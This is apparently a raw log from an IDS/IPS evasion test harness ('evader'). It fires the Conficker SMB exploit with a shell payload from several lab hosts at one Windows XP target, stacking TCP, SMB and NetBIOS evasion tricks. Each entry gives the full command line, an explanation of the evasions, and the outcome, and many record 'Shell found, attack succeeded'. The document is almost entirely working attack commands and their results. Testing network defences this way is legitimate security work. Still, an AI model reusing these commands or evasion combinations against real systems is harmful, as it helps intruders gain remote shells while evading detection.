  3025. .......
  3026. 5262 runs averaging 1.94 runs / second ; progress: 2706/43200................
  3027. 5278 runs averaging 1.95 runs / second ; progress: 2711/43200...........
  3028. 5289 runs averaging 1.95 runs / second ; progress: 2716/43200......
  3029. 5295 runs averaging 1.95 runs / second ; progress: 2721/43200............
  3030. 5307 runs averaging 1.95 runs / second ; progress: 2726/43200.............
  3031. 5320 runs averaging 1.95 runs / second ; progress: 2731/43200...................
  3032. 5339 runs averaging 1.95 runs / second ; progress: 2736/43200...............
  3033. 5354 runs averaging 1.95 runs / second ; progress: 2741/43200Pid 5432 timed out - killed
  3034. 2015-06-08 00:05:11 INFO
  3035. Timed out (10.62.90.118):
  3036. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38134 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IXFVjUV0NBU --evasion=[start,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|longhdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"1","2","random_alpha" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3037. Info: Using random seed IXFVjUV0NBU
  3038. The following evasions are applied from stage start to smb_opentree:
  3039. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  3040. * NULL TCP control flags.
  3041. * An out-of-window sequence number.
  3042. * TCP header longer than packet total size
  3043. * Duplicate packet has 30 bytes of original payload, then shuffled original payload
  3044. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3045. - TCP timestamps echo reply value is sent in the wrong endianness
  3046. The following evasions are applied from stage smb_openpipe to end:
  3047. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
  3048.  
  3049. Info: NetBIOS connection 10.62.90.118:38134 -> 10.35.1.207:445
  3050. Terminated
  3051. ........
  3052. 5363 runs averaging 1.95 runs / second ; progress: 2746/43200.....
  3053. 5368 runs averaging 1.95 runs / second ; progress: 2751/43200.........
  3054. 5377 runs averaging 1.95 runs / second ; progress: 2756/43200........Pid 5835 timed out - killed
  3055. 2015-06-08 00:05:28 INFO
  3056. Timed out (10.62.90.114):
  3057. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60575 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=gdbOuPqrGXQ --evasion=[msrpc_req,end]smb_decoytrees,"1","6","2","zero" --evasion=[msrpc_req,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  3058. Info: Using random seed gdbOuPqrGXS
  3059. The following evasions are applied from stage msrpc_req to end:
  3060. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  3061. - Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of zeroes.
  3062.  
  3063. Info: NetBIOS connection 10.62.90.114:60575 -> 10.35.1.207:445
  3064. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3065. Info: Sending MSRPC request with exploit
  3066. Terminated
  3067. ..............
  3068. 5400 runs averaging 1.96 runs / second ; progress: 2761/43200.................
  3069. 5417 runs averaging 1.96 runs / second ; progress: 2766/43200..........2015-06-08 00:05:39 INFO
  3070. Success. (10.62.90.117):
  3071. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=L4awF43Jyu8 --evasion=[netbios_connect,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
  3072. Info: Using random seed L4awF43Jyu8
  3073. The following evasions are applied from stage netbios_connect to smb_opentree:
  3074. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  3075. * NULL TCP control flags.
  3076. * An out-of-window sequence number.
  3077. * TCP header shorter than 20 bytes
  3078. * TCP header longer than packet total size
  3079. * Duplicate packet has original payload with alphanumeric bytes randomized
  3080. The following evasions are applied from stage msrpc_bind to end:
  3081. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  3082.  
  3083. Info: NetBIOS connection 10.62.90.117:33189 -> 10.35.1.207:445
  3084. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3085. Info: Sending MSRPC request with exploit
  3086. Info: Shell found, attack succeeded
  3087. Info: Shell closed
  3088. 0: Success.
  3089. .....
  3090. 5433 runs averaging 1.96 runs / second ; progress: 2771/43200...Pid 6275 timed out - killed
  3091. .2015-06-08 00:05:44 INFO
  3092. Timed out (10.62.90.110):
  3093. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18545 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=9j13UKNIujo --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  3094. Info: Using random seed 9j13UKNIujr
  3095. The following evasions are applied from stage smb_connect to smb_openpipe:
  3096. - TCP timestamps echo reply value is sent in the wrong endianness
  3097. The following evasions are applied from stage smb_opentree to msrpc_req:
  3098. - 25% probability to add a zero urgent data byte to a TCP segment.
  3099.  
  3100. Info: NetBIOS connection 10.62.90.110:18545 -> 10.35.1.207:445
  3101. Terminated
  3102. ....
  3103. 5442 runs averaging 1.96 runs / second ; progress: 2776/43200............
  3104. 5454 runs averaging 1.96 runs / second ; progress: 2781/43200..............................
  3105. 5484 runs averaging 1.97 runs / second ; progress: 2786/43200......2015-06-08 00:05:57 INFO
  3106. Success. (10.62.90.117):
  3107. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38094 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Ob4ff1j+QiM --evasion=[msrpc_req,end]netbios_chaff,"13","empty_unspec|http_post|broken_length" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","268435455","alphanumrandomized" --verifydelay=1000 --payload=shell
  3108. Info: Using random seed Ob4ff1j+QiM
  3109. The following evasions are applied from stage smb_connect to msrpc_req:
  3110. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
  3111. The following evasions are applied from stage msrpc_req to end:
  3112. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  3113.  
  3114. Info: NetBIOS connection 10.62.90.117:38094 -> 10.35.1.207:445
  3115. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3116. Info: Sending MSRPC request with exploit
  3117. Info: Shell found, attack succeeded
  3118. Info: Command shell connection reset.
  3119. Info: CommandShell::SendCommand() - Failed to send string
  3120. Info: Shell closed
  3121. 0: Success.
  3122. .........2015-06-08 00:05:59 INFO
  3123. Success. (10.62.90.119):
  3124. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41416 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=W6ooJoo6NGg --evasion=[smb_opentree,msrpc_bind]smb_chaff,"3","write_flag","rand" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","shuffle30" --verifydelay=1000 --payload=shell
  3125. Info: Using random seed W6ooJoo6NGh
  3126. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3127. - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  3128. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3129. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 30 bytes of original payload, then shuffled original payload
  3130.  
  3131. Info: NetBIOS connection 10.62.90.119:41416 -> 10.35.1.207:445
  3132. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3133. Info: Sending MSRPC request with exploit
  3134. Info: Shell found, attack succeeded
  3135. Info: Shell closed
  3136. 0: Success.
  3137. ...........2015-06-08 00:06:01 INFO
  3138. Success. (10.62.90.116):
  3139. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37607 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=dEFeq3VZExs --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1480" --evasion=[smb_openpipe,end]tcp_paws,"75%","86788071","zero" --verifydelay=1000 --payload=shell
  3140. Info: Using random seed dEFeq3VZExt
  3141. The following evasions are applied from stage smb_connect to msrpc_bind:
  3142. - IPv4 fragments with at most 1480 bytes per fragment
  3143. The following evasions are applied from stage smb_openpipe to end:
  3144. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 86788071> and has 0x00 bytes as payload
  3145.  
  3146. Info: NetBIOS connection 10.62.90.116:37607 -> 10.35.1.207:445
  3147. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3148. Info: Sending MSRPC request with exploit
  3149. Info: Shell found, attack succeeded
  3150. Info: Shell closed
  3151. 0: Success.
  3152. .....
  3153. 5518 runs averaging 1.98 runs / second ; progress: 2791/43200..2015-06-08 00:06:02 INFO
  3154. Success. (10.62.90.116):
  3155. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59212 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KcAUp61efmk --evasion=[smb_opentree,end]tcp_chaff,"25%","longhdr","alphanumrandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","9","alpharandomized" --verifydelay=1000 --payload=shell
  3156. Info: Using random seed KcAUp61efmk
  3157. The following evasions are applied from stage netbios_connect to msrpc_req:
  3158. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
  3159. The following evasions are applied from stage smb_opentree to end:
  3160. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  3161. * TCP header longer than packet total size
  3162. * Duplicate packet has original payload with alphanumeric bytes randomized
  3163.  
  3164. Info: NetBIOS connection 10.62.90.116:59212 -> 10.35.1.207:445
  3165. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3166. Info: Sending MSRPC request with exploit
  3167. Info: Shell found, attack succeeded
  3168. Info: CommandShell::SendCommand() - Failed to send string
  3169. Info: Command shell connection reset.
  3170. Info: Shell closed
  3171. 0: Success.
  3172. ...........................
  3173. 5548 runs averaging 1.98 runs / second ; progress: 2796/43200...........
  3174. 5559 runs averaging 1.98 runs / second ; progress: 2802/43200..............
  3175. 5573 runs averaging 1.99 runs / second ; progress: 2807/43200.2015-06-08 00:06:17 INFO
  3176. Success. (10.62.90.118):
  3177. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16184 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=hDX3Ay+q5YA --evasion=[start,msrpc_req]tcp_chaff,"25%","chksum|nullflag|shorthdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"25%","133338995","zero" --verifydelay=1000 --payload=shell
  3178. Info: Using random seed hDX3Ay+q5YC
  3179. The following evasions are applied from stage start to msrpc_req:
  3180. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  3181. * Invalid TCP checksum.
  3182. * NULL TCP control flags.
  3183. * TCP header shorter than 20 bytes
  3184. * Duplicate packet has 30 bytes of original payload, then shuffled original payload
  3185. The following evasions are applied from stage smb_openpipe to end:
  3186. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 133338995> and has 0x00 bytes as payload
  3187.  
  3188. Info: NetBIOS connection 10.62.90.118:16184 -> 10.35.1.207:445
  3189. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3190. Info: Sending MSRPC request with exploit
  3191. Info: Shell found, attack succeeded
  3192. Info: CommandShell::SendCommand() - Failed to send string
  3193. Info: Command shell connection reset.
  3194. Info: Shell closed
  3195. 0: Success.
  3196. ..............
  3197. 5589 runs averaging 1.99 runs / second ; progress: 2812/43200..................
  3198. 5607 runs averaging 1.99 runs / second ; progress: 2817/43200...................
  3199. 5626 runs averaging 1.99 runs / second ; progress: 2822/43200..............
  3200. 5640 runs averaging 2.00 runs / second ; progress: 2827/43200.......2015-06-08 00:06:40 INFO
  3201. Success. (10.62.90.116):
  3202. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55004 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HTMWhpt4lOI --evasion=[msrpc_bind,end]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","random" --verifydelay=1000 --payload=shell
  3203. Info: Using random seed HTMWhpt4lOI
  3204. The following evasions are applied from stage netbios_connect to smb_connect:
  3205. - 50% probability to add a random urgent data byte to a TCP segment.
  3206. The following evasions are applied from stage msrpc_bind to end:
  3207. - TCP timestamps echo reply value is sent in the wrong endianness
  3208. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
  3209.  
  3210. Info: NetBIOS connection 10.62.90.116:55004 -> 10.35.1.207:445
  3211. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3212. Info: Sending MSRPC request with exploit
  3213. Info: Shell found, attack succeeded
  3214. Info: Shell closed
  3215. 0: Success.
  3216. ...
  3217. 5651 runs averaging 2.00 runs / second ; progress: 2832/43200.............
  3218. 5664 runs averaging 2.00 runs / second ; progress: 2837/43200...............
  3219. 5679 runs averaging 2.00 runs / second ; progress: 2842/43200..........
  3220. 5689 runs averaging 2.00 runs / second ; progress: 2847/43200.....
  3221. 5694 runs averaging 2.00 runs / second ; progress: 2852/43200............
  3222. 5706 runs averaging 2.00 runs / second ; progress: 2857/43200..........Pid 8518 timed out - killed
  3223. 2015-06-08 00:07:11 INFO
  3224. Timed out (10.62.90.112):
  3225. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28446 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=F6sYh44LGYY --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  3226. Info: Using random seed F6sYh44LGYY
  3227. The following evasions are applied from stage start to smb_connect:
  3228. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3229. The duplicate packet has shuffled TCP payload
  3230. The following evasions are applied from stage smb_connect to msrpc_bind:
  3231. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  3232.  
  3233. Info: NetBIOS connection 10.62.90.112:28446 -> 10.35.1.207:445
  3234. Terminated
  3235. 2015-06-08 00:07:11 INFO
  3236. Success. (10.62.90.118):
  3237. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46988 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Sv3aj7zFtLI --evasion=[netbios_connect,msrpc_req]netbios_chaff,"8","small_unspec" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","52269486","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"25%","205278740","random_alphanum" --verifydelay=1000 --payload=shell
  3238. Info: Using random seed Sv3aj7zFtLJ
  3239. The following evasions are applied from stage netbios_connect to msrpc_req:
  3240. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52269486> and has random alphanumeric bytes as payload
  3241. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type.
  3242. The following evasions are applied from stage msrpc_bind to end:
  3243. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 205278740> and has random alphanumeric bytes as payload
  3244.  
  3245. Info: NetBIOS connection 10.62.90.118:46988 -> 10.35.1.207:445
  3246. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3247. Info: Sending MSRPC request with exploit
  3248. Info: Shell found, attack succeeded
  3249. Info: Command shell connection reset.
  3250. Info: CommandShell::SendCommand() - Failed to send string
  3251. Info: Shell closed
  3252. 0: Success.
  3253. ....
  3254. 5722 runs averaging 2.00 runs / second ; progress: 2862/43200...................
  3255. 5741 runs averaging 2.00 runs / second ; progress: 2867/43200.................
  3256. 5758 runs averaging 2.00 runs / second ; progress: 2872/43200............
  3257. 5770 runs averaging 2.01 runs / second ; progress: 2877/43200..........
  3258. 5780 runs averaging 2.01 runs / second ; progress: 2882/43200..................
  3259. 5798 runs averaging 2.01 runs / second ; progress: 2887/43200...................2015-06-08 00:07:41 INFO
  3260. Success. (10.62.90.116):
  3261. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65225 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=b+LULLXLP9A --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","4","1645","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","zero" --verifydelay=1000 --payload=shell
  3262. Info: Using random seed b+LULLXLP9B
  3263. The following evasions are applied from stage smb_opentree to smb_openpipe:
  3264. - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 1645 bytes of MSRPC bind-like data.
  3265. The following evasions are applied from stage smb_openpipe to end:
  3266. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
  3267.  
  3268. Info: NetBIOS connection 10.62.90.116:65225 -> 10.35.1.207:445
  3269. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3270. Info: Sending MSRPC request with exploit
  3271. Info: Shell found, attack succeeded
  3272. Info: Shell closed
  3273. 0: Success.
  3274. ....
  3275. 5822 runs averaging 2.01 runs / second ; progress: 2892/432002015-06-08 00:07:42 INFO
  3276. Success. (10.62.90.116):
  3277. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14977 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=/6AH03N7Zfg --evasion=[smb_connect,end]tcp_paws,"50%","108770038","alphanumrandomized" --evasion=[msrpc_req,end]tcp_segvar,"7","30328" --verifydelay=1000 --payload=shell
  3278. Info: Using random seed /6AH03N7Zfj
  3279. The following evasions are applied from stage smb_connect to end:
  3280. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 108770038> and has original payload with alphanumeric bytes randomized
  3281. The following evasions are applied from stage msrpc_req to end:
  3282. - TCP packets are segmented to contain between 7 and 30328 bytes of payload.
  3283.  
  3284. Info: NetBIOS connection 10.62.90.116:14977 -> 10.35.1.207:445
  3285. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3286. Info: Sending MSRPC request with exploit
  3287. Info: Shell found, attack succeeded
  3288. Info: CommandShell::SendCommand() - Failed to send string
  3289. Info: Command shell connection reset.
  3290. Info: Shell closed
  3291. 0: Success.
  3292. .................
  3293. 5840 runs averaging 2.02 runs / second ; progress: 2897/43200..................
  3294. 5858 runs averaging 2.02 runs / second ; progress: 2902/43200.................
  3295. 5875 runs averaging 2.02 runs / second ; progress: 2907/43200...............2015-06-08 00:08:00 INFO
  3296. Success. (10.62.90.115):
  3297. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51948 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fl6e6aGm5+U --evasion=[smb_opentree,end]netbios_chaff,"13","empty_unspec|empty_keepalive|msrpc_req" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","92936105","random_alphanum" --verifydelay=1000 --payload=shell
  3298. Info: Using random seed fl6e6aGm5+V
  3299. The following evasions are applied from stage smb_opentree to end:
  3300. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  3301. The following evasions are applied from stage msrpc_bind to msrpc_req:
  3302. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 92936105> and has random alphanumeric bytes as payload
  3303.  
  3304. Info: NetBIOS connection 10.62.90.115:51948 -> 10.35.1.207:445
  3305. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3306. Info: Sending MSRPC request with exploit
  3307. Info: Shell found, attack succeeded
  3308. Info: Command shell connection reset.
  3309. Info: CommandShell::SendCommand() - Failed to send string
  3310. Info: Shell closed
  3311. 0: Success.
  3312. .......
  3313. 5898 runs averaging 2.03 runs / second ; progress: 2912/432002015-06-08 00:08:03 INFO
  3314. Success. (10.62.90.112):
  3315. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46316 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=WPmLbVV+KN8 --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[start,end]tcp_paws,"25%","248594867","random_alphanum" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","140365635","alpharandomized" --verifydelay=1000 --payload=shell
  3316. Info: Using random seed WPmLbVV+KN9
  3317. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248594867> and has random alphanumeric bytes as payload
  3318. The following evasions are applied from stage netbios_connect to smb_opentree:
  3319. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140365635> and has original payload with alphabetic bytes randomized
  3320. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  3321. - The SMB filename is obfuscated:
  3322. * Random characters case is changed
  3323. * Dummy paths are added ( a/b -> a/c/../b )
  3324. * A 0x00 and random alphanumeric characters are appended to the filename
  3325.  
  3326. Info: NetBIOS connection 10.62.90.112:46316 -> 10.35.1.207:445
  3327. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3328. Info: Sending MSRPC request with exploit
  3329. Info: Shell found, attack succeeded
  3330. Info: CommandShell::SendCommand() - Failed to send string
  3331. Info: Command shell connection reset.
  3332. Info: Shell closed
  3333. 0: Success.
  3334. ..........Pid 9568 timed out - killed
  3335. 2015-06-08 00:08:07 INFO
  3336. Timed out (10.62.90.113):
  3337. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20559 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Lu/W+J+ia8E --evasion=[netbios_connect,smb_connect]tcp_urgent,"5","zero" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  3338. Info: Using random seed Lu/W+J+ia8E
  3339. The following evasions are applied from stage netbios_connect to smb_connect:
  3340. - Add a zero urgent data byte to every 5 TCP segment.
  3341. The following evasions are applied from stage smb_opentree to msrpc_req:
  3342. - Add a random urgent data byte to every 2 TCP segment.
  3343.  
  3344. Info: NetBIOS connection 10.62.90.113:20559 -> 10.35.1.207:445
  3345. Terminated
  3346.  
  3347. 5910 runs averaging 2.03 runs / second ; progress: 2917/43200........2015-06-08 00:08:10 INFO
  3348. Success. (10.62.90.112):
  3349. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26515 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dmrBvWj+KHs --evasion=[start,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,msrpc_req]smb_chaff,"21","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","161045439","shuffle" --verifydelay=1000 --payload=shell
  3350. Info: Using random seed dmrBvWj+KHt
  3351. The following evasions are applied from stage start to msrpc_req:
  3352. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3353. The duplicate packet has identical payload
  3354. The following evasions are applied from stage smb_opentree to msrpc_req:
  3355. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161045439> and has shuffled original payload
  3356. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3357. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  3358.  
  3359. Info: NetBIOS connection 10.62.90.112:26515 -> 10.35.1.207:445
  3360. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3361. Info: Sending MSRPC request with exploit
  3362. Info: Shell found, attack succeeded
  3363. Info: Shell closed
  3364. 0: Success.
  3365. ......
  3366. 5925 runs averaging 2.03 runs / second ; progress: 2922/43200.2015-06-08 00:08:13 INFO
  3367. Success. (10.62.90.112):
  3368. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29584 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=tYONh/AvK4Y --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"1","268435455","random_alpha" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
  3369. Info: Using random seed tYONh/AvK4a
  3370. The following evasions are applied from stage netbios_connect to end:
  3371. - TCP receive window is set to at most 1048575 bytes.
  3372. The following evasions are applied from stage smb_connect to end:
  3373. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  3374. The following evasions are applied from stage smb_opentree to smb_openpipe:
  3375. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  3376.  
  3377. Info: NetBIOS connection 10.62.90.112:29584 -> 10.35.1.207:445
  3378. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3379. Info: Sending MSRPC request with exploit
  3380. Info: Shell found, attack succeeded
  3381. Info: Command shell connection reset.
  3382. Info: CommandShell::SendCommand() - Failed to send string
  3383. Info: Shell closed
  3384. 0: Success.
  3385. .....................
  3386. 5948 runs averaging 2.03 runs / second ; progress: 2928/43200............2015-06-08 00:08:22 INFO
  3387. Success. (10.62.90.116):
  3388. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26011 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=jfv1oCGsfoE --evasion=[msrpc_bind,end]tcp_paws,"50%","8","random_alpha" --evasion=[netbios_connect,smb_connect]tcp_segvar,"5","65534" --verifydelay=1000 --payload=shell
  3389. Info: Using random seed jfv1oCGsfoG
  3390. The following evasions are applied from stage netbios_connect to smb_connect:
  3391. - TCP packets are segmented to contain between 5 and 65534 bytes of payload.
  3392. The following evasions are applied from stage msrpc_bind to end:
  3393. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  3394.  
  3395. Info: NetBIOS connection 10.62.90.116:26011 -> 10.35.1.207:445
  3396. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3397. Info: Sending MSRPC request with exploit
  3398. Info: Shell found, attack succeeded
  3399. Info: Shell closed
  3400. 0: Success.
  3401. ...
  3402. 5964 runs averaging 2.03 runs / second ; progress: 2933/43200................
